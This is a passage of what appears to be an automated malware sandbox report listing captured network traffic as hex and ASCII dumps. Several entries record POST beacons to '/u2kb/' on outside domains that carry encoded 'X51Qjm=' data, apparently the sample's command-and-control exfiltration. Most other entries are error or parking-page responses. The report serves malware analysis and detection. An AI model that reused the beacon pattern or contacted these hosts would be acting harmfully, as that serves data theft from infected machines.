X51Qjm=VfRxwRQAb9hS4igCabUOtsCX3374uptF69J5MloX8R~aTC4yCUYmtvOYT0CwwkWbg0NVwYb4~GF5dO6AVYtZ92kxcBTbTPivHcMYkTrrxLVRCG1xjws1v0l4mZ8a6dHyECXJOXJwLJSHcD44uprvKmyss6(PEHErYlGE9t2ngX0XN-P3RA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.thedivinerudraksha.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedivinerudraksha.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 76 6b 52 79 55 54 39 48 56 37 31 4b 53 39 69 70 58 76 6c 62 5a 2d 54 52 6a 2d 42 6f 6b 59 51 73 52 45 6b 54 6f 4b 39 64 75 5a 43 34 65 75 6b 6a 35 6a 76 55 30 52 32 72 47 74 7e 63 4f 39 70 54 28 75 4a 6c 4f 4d 47 50 6d 6e 75 76 6d 70 62 69 65 73 38 32 31 49 63 74 65 59 51 61 48 5a 57 45 65 4b 70 71 69 6d 38 45 48 68 4b 41 62 7a 64 2d 31 61 32 6d 50 56 73 46 53 57 56 71 31 73 30 72 35 4e 63 38 39 75 50 59 77 6d 71 4b 38 34 73 48 4b 63 46 38 53 75 31 48 6a 77 4f 66 4a 4d 31 36 35 6a 66 6e 44 57 4e 61 70 55 61 62 7e 31 69 66 7e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=vkRyUT9HV71KS9ipXvlbZ-TRj-BokYQsREkToK9duZC4eukj5jvU0R2rGt~cO9pT(uJlOMGPmnuvmpbies821IcteYQaHZWEeKpqim8EHhKAbzd-1a2mPVsFSWVq1s0r5Nc89uPYwmqK84sHKcF8Su1HjwOfJM165jfnDWNapUab~1if~g).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.un-object.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.un-object.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.un-object.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6b 54 72 45 4b 70 64 4c 49 67 35 6e 53 45 58 46 49 30 51 31 34 50 31 6a 65 47 51 39 7e 4c 69 66 52 76 67 68 61 35 32 79 77 6d 7e 62 4b 43 4f 38 32 69 72 55 51 78 72 36 28 5f 41 6e 31 32 58 39 54 56 38 71 61 54 45 52 49 35 71 74 31 7a 70 73 46 43 64 51 6a 6c 50 57 4d 47 4c 38 68 67 53 5f 36 30 6e 43 66 37 44 31 67 38 61 70 38 64 73 70 28 4e 73 43 32 4a 4b 65 65 53 56 73 76 6c 51 5a 79 6c 66 2d 64 5a 6f 34 57 4a 4d 72 76 69 63 30 64 70 42 7a 77 38 47 73 57 43 76 63 46 74 41 4e 50 37 79 51 6c 71 30 39 69 4d 65 6b 66 6b 4a 6d 50 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=kTrEKpdLIg5nSEXFI0Q14P1jeGQ9~LifRvgha52ywm~bKCO82irUQxr6(_An12X9TV8qaTERI5qt1zpsFCdQjlPWMGL8hgS_60nCf7D1g8ap8dsp(NsC2JKeeSVsvlQZylf-dZo4WJMrvic0dpBzw8GsWCvcFtANP7yQlq09iMekfkJmPA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 16:51:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 16:51:13 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 16:51:18 GMTContent-Type: text/htmlContent-Length: 199Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e c1 0e 82 30 10 44 ef fd 8a d5 bb 5d 34 1e 9b 26 4a 4b 6c 82 60 4c 39 70 14 a8 81 a8 10 69 91 df b7 d5 8b ff e0 de 66 f6 ed cc b2 85 c8 63 5d 9e 24 1c f4 31 85 53 b1 4f 55 0c cb 15 a2 92 3a 41 14 5a 7c 37 1b 1a 21 ca 6c c9 09 0b 9a b3 83 dc 09 2f b4 d2 a9 e4 db 68 0b d9 e0 20 19 a6 be 61 f8 35 09 c3 0f c4 f6 b9 28 c3 dd 9a ff 30 5e 11 dd 1a 18 cd 73 32 d6 99 06 8a 73 0a 38 6d 6e 15 c2 7c b1 d0 7b f6 1a 58 18 7a 70 6d 67 c1 9a f1 65 46 ea 93 ce 3e 4e f1 79 9e 69 d5 b9 60 77 b5 b1 77 d7 d0 7a 78 30 54 a1 fa 53 ea 6b c2 b3 e4 9f e7 0d 15 d1 11 fb e3 01 00 00 Data Ascii: 0D]4&JKl`L9pifc]$1SOU:AZ|7!l/h a5(0^s2s8mn|{XzpmgeF>Nyi`wwzx0TSk
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 16:51:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccept-Ranges: bytesVary: Accept-Encoding,User-AgentData Raw: 32 36 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 32 6b 62 2f 3f 58 35 31 51 6a 6d 3d 72 72 2b 73 4f 42 76 45 58 73 42 64 47 65 76 55 6b 5a 45 41 76 6e 69 47 57 72 4e 78 7a 43 31 59 4e 48 6d 58 69 76 72 39 32 46 51 68 52 49 49 59 73 65 64 52 68 4c 2b 59 47 61 4e 32 56 43 69 65 47 74 6a 74 4c 54 55 54 7a 55 71 78 44 58 33 57 66 37 57 6f 76 66 4d 52 4d 39 63 65 43 75 54 6d 33 51 3d 3d 26 61 6d 70 3b 77 36 44 4e 5f 3d 45 30 45 51 53 4d 30 52 43 62 33 34 39 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 62 69 74 73 65 72 76 69 63 65 73 6c 74 64 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a Data Ascii: 268<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&amp;w6DN_=E0EQSM0RCb349p was not found on this server.<HR><I>www.bitservicesltd.com</I></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 20 Mar 2023 16:51:26 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:51:34 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:51:36 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 38 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 16:51:52 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:51:58 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:52:01 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 